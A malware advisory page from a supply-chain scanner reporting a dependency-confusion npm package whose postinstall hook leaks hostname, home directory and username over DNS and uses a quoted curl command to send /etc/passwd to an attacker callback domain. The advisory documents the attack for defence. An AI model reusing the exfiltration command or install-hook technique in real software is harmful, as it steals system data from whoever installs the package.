LWA-2026-1187 MAL-2026-5392 ↗ confirmed malware

@open-banking/cabinet-providers@999.9.5

Malicious code in @open-banking/cabinet-providers (npm)

T1195.002 · Compromise Software Supply Chain

Analysis

Dependency confusion stub (version 999.9.5, 820 bytes, scoped name shadowing @open-banking/cabinet-providers) with postinstall hook that exfiltrates system data to oastify[.]com attacker-controlled callback domain via two vectors: (1) node scripts/scream3gg.js hex-encodes hostname/homedir/username and sends each as DNS labels to nmd25sur8sjp60lm75dp67e2gtmkaayz[.]oastify[.]com, (2) curl --data '@/etc/passwd' $(hostname).200hj786m7x4kfz1lkr4kmshu80zoqcf[.]oastify[.]com exfils the passwd file. Publisher is a throwaway iCloud identity. This is a dependency confusion supply-chain attack with data exfiltration — recommend immediate human writeup.

analyzed by
Leitwacht
first seen
May 29, 2026, 10:16 AM
analyzed
May 29, 2026, 09:46 PM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.